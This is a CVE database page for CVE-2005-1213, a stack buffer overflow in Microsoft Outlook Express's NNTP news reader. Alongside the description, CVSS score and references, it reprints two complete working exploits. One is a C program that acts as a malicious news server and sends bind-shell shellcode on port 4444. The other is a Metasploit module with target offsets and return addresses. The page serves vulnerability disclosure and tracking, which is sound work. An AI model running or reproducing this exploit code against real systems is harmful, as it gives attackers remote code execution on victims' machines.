CVE-2005-1213 : Detail

CVE-2005-1213

97.3%V3
Network
2005-06-14
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Stack-based buffer overflow in the news reader for Microsoft Outlook Express (MSOE.DLL) 5.5 SP2, 6, and 6 SP1 allows remote malicious NNTP servers to execute arbitrary code via a LIST response with a long second field.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1066

Publication date : 2005-06-23 22h00 +00:00
Author : eyas
EDB Verified : Yes

#include <winsock2.h> #include <windows.h> #include <stdio.h> #include <stdlib.h> #pragma comment(lib,"ws2_32") /* win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x96" "\x27\xc8\x3e\x83\xeb\xfc\xe2\xf4\x6a\x4d\x23\x73\x7e\xde\x37\xc1" "\x69\x47\x43\x52\xb2\x03\x43\x7b\xaa\xac\xb4\x3b\xee\x26\x27\xb5" "\xd9\x3f\x43\x61\xb6\x26\x23\x77\x1d\x13\x43\x3f\x78\x16\x08\xa7" "\x3a\xa3\x08\x4a\x91\xe6\x02\x33\x97\xe5\x23\xca\xad\x73\xec\x16" "\xe3\xc2\x43\x61\xb2\x26\x23\x58\x1d\x2b\x83\xb5\xc9\x3b\xc9\xd5" "\x95\x0b\x43\xb7\xfa\x03\xd4\x5f\x55\x16\x13\x5a\x1d\x64\xf8\xb5" "\xd6\x2b\x43\x4e\x8a\x8a\x43\x7e\x9e\x79\xa0\xb0\xd8\x29\x24\x6e" "\x69\xf1\xae\x6d\xf0\x4f\xfb\x0c\xfe\x50\xbb\x0c\xc9\x73\x37\xee" "\xfe\xec\x25\xc2\xad\x77\x37\xe8\xc9\xae\x2d\x58\x17\xca\xc0\x3c" "\xc3\x4d\xca\xc1\x46\x4f\x11\x37\x63\x8a\x9f\xc1\x40\x74\x9b\x6d" "\xc5\x74\x8b\x6d\xd5\x74\x37\xee\xf0\x4f\xd9\x62\xf0\x74\x41\xdf" "\x03\x4f\x6c\x24\xe6\xe0\x9f\xc1\x40\x4d\xd8\x6f\xc3\xd8\x18\x56" "\x32\x8a\xe6\xd7\xc1\xd8\x1e\x6d\xc3\xd8\x18\x56\x73\x6e\x4e\x77" "\xc1\xd8\x1e\x6e\xc2\x73\x9d\xc1\x46\xb4\xa0\xd9\xef\xe1\xb1\x69" "\x69\xf1\x9d\xc1\x46\x41\xa2\x5a\xf0\x4f\xab\x53\x1f\xc2\xa2\x6e" "\xcf\x0e\x04\xb7\x71\x4d\x8c\xb7\x74\x16\x08\xcd\x3c\xd9\x8a\x13" "\x68\x65\xe4\xad\x1b\x5d\xf0\x95\x3d\x8c\xa0\x4c\x68\x94\xde\xc1" "\xe3\x63\x37\xe8\xcd\x70\x9a\x6f\xc7\x76\xa2\x3f\xc7\x76\x9d\x6f" "\x69\xf7\xa0\x93\x4f\x22\x06\x6d\x69\xf1\xa2\xc1\x69\x10\x37\xee" "\x1d\x70\x34\xbd\x52\x43\x37\xe8\xc4\xd8\x18\x56\xe8\xff\x2a\x4d" "\xc5\xd8\x1e\xc1\x46\x27\xc8\x3e"; struct { DWORD dwJMPEBX; char *szDescription; }targets[] = { {0x7803382b, "win2k sp4 all language"} },v; void usage(char *p) { int i; printf( "Usage: %s <type>\n" "[type]\n", p); for(i=0;i<sizeof(targets)/sizeof(v);i++) { printf("%d\t%s\n", i, targets[i].szDescription); } } void main(int argc, char **argv) { struct sockaddr_in server,client; WSADATA wsd; SOCKET s2,s3; int ret; char szRecvBuff[0x100]; char szSend[] = "200\r\n"; int i,iType; char szEvil[0x3000], szTmp[0x10]; printf( "MS OE NNTP \"LIST\" Buffer Overflow (MS05-030) EXP\n" "Credits: Bug found by iDEFENSE\n" "coded by eyas < eyas at xfocus.org>\n" "http://www.xfocus.net\n\n"); if(argc!=2) { usage(argv[0]); return; } iType = atoi(argv[1]); if (WSAStartup(MAKEWORD(1,1), &wsd) != 0) { printf("[-] WSAStartup error:%d\n", WSAGetLastError()); return; } s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); server.sin_family = AF_INET; server.sin_port = htons(119); server.sin_addr.s_addr= 0; ret = bind(s2, (struct sockaddr *)&server, sizeof(server)); ret = listen(s2, 100); printf("[+] Listen on TCP 119.\n"); while(1) { ret=sizeof(client); s3 = accept(s2, (struct sockaddr *)&client, &ret); printf("[+] Connection accepted from %s:%d\n", inet_ntoa(client.sin_addr), ntohs(client.sin_port)); printf("[+] Send welcome information.\n"); send(s3, szSend, strlen(szSend), 0); ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0); szRecvBuff[ret-1] = '\x0'; printf("[+] Recv: [%s]\n", szRecvBuff); send(s3, szSend, strlen(szSend), 0); printf("[+] Send response.\n"); ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0); szRecvBuff[ret-4] = '\x0'; printf("[+] Recv: [%s]\n", szRecvBuff); printf("[+] send evil buff.\n"); strcpy(szTmp, "\xEB\x06\xEB\x06"); memcpy(&szTmp[4], &(targets[iType].dwJMPEBX),4); szTmp[8]='\x0'; strcpy(szEvil, "215 list\r\ngroup aaaa"); //for(i=0;i<0x2598;i++) //for(i=0;i<0x30;i++) for(i=0;i<0x2598+0x200;i+=8) strcat(szEvil, szTmp); strcat(szEvil, (char *)scode); strcat(szEvil, " 1 y\r\n.\r\n"); send(s3, szEvil, strlen(szEvil), 0); Sleep(1000); closesocket(s3); printf("[+] close connection\n"); } WSACleanup(); return; } // milw0rm.com [2005-06-24]
Exploit Database EDB-ID : 16379

Publication date : 2010-05-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ms05_030_nntp.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Outlook Express NNTP Response Parsing Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the news reader of Microsoft Outlook Express. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2005-1213' ], [ 'OSVDB', '17306' ], [ 'BID', '13951' ], [ 'MSB', 'MS05-030' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 750, 'BadChars' => "\x00", 'MaxNops' => 0, 'StackAdjustment' => -3500, 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, }, 'Platform' => 'win', 'Targets' => [ ['Windows 2000 English SP0-SP4', { 'Offset' => 9624, 'Ret' => 0x75022ac4 }], ['Windows XP English SP0/SP1', { 'Offset' => 9596, 'Ret' => 0x71aa2461 }], ], 'Privileged' => false, 'DisclosureDate' => 'Jun 14 2005', 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The NNTPServer daemon port to listen on", 119 ]) ], self.class) end def on_client_connect(client) yup = "200\r\n" client.put(yup) client.put(yup) end def on_client_data(client) return if ((p = regenerate_payload(client)) == nil) filler = "215 list\r\n" + "group " filler << rand_text_english(target['Offset']) seh = generate_seh_payload(target.ret) sploit = filler + seh + " 1 y\r\n\.\r\n" print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") client.put(sploit) handler service.close_client(client) end end

Products Mentioned

Configuraton 0

Microsoft>>Outlook_express >> Version 5.5

Microsoft>>Outlook_express >> Version 6.0

Microsoft>>Outlook_express >> Version 6.0

References

http://www.securityfocus.com/bid/13951
Tags : vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/130614
Tags : third-party-advisory, x_refsource_CERT-VN
http://securitytracker.com/id?1014200
Tags : vdb-entry, x_refsource_SECTRACK